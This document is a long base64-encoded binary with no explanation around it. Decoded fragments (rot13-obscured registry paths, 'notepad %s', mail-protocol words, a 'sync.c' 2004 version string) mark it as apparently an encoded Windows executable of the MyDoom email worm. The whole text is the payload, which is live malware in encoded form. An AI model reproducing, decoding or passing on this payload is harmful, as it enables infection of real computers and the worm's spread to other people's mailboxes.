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
